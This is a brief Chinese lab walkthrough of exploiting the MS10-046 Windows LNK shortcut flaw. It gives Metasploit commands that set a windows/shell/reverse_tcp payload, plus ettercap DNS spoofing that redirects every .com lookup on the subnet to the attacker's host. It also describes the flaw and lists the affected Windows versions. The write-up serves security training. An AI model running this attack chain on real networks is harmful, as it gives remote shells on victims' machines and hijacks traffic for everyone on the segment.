ms10-046漏洞攻击
实验过程
- 1.通过命令:
ipconfig
、ifconfig
确认攻击机和靶机在同一网段 - 2.通过ping命令确认靶机存活。
- 3.通过命令:
msfconsole
启用msf。 - 4.攻击。
- 1.搜索漏洞,命令:
search ms10-046
。通过use
使用漏洞。 - 2.设置主机监听地址,命令:
set srvhost 本机ip地址
- 3.设置攻击机地址,命令:
set lhost 本机ip
- 4.加载攻击载荷,命令:
set payload windows/shell/reverse_tcp
。 - 5.进行攻击:
exploit/run
- 1.搜索漏洞,命令:
- 5.配合使用ettercap进行dns欺骗。在文件最后添加
*.com A 本机ip
。cd /etc/ettercap
ls
vim etter.dns
- 6.开启ettercap劫持整个网段,命令:
ettercap -T -q -i eth0 -P dns_spoof ////
- 7.劫持成功
漏洞描述:
Microsoft Windows快捷方式LNK文件自动执行代码漏洞
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞
受影响系统包括:Windows XP SP3/SP2、Vista SP2/SP1、Server 2008 R2/SP2和Windows 7